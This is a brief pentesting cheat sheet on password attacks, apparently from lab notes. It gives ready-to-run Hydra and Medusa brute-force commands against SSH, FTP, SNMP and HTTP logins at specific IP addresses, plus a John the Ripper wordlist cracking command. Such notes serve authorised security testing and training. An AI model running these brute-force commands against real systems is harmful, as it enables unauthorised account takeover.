Password attacks
usr/share/wordlists
usr/share/wordlistsMedusa
medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10Hydra
hydra -P password.txt -v 10.11.1.210 snmp
hydra -l admin -P password.txt -v 122.168.31.219 ftp
hydra -l root -P password.txt 10.11.1.219 ssh
hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin** Brute force http-post login forms
Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>"
Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"John the Ripper
john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txtSSH keys
Hashcat
Passing the hash (Windows)
Last updated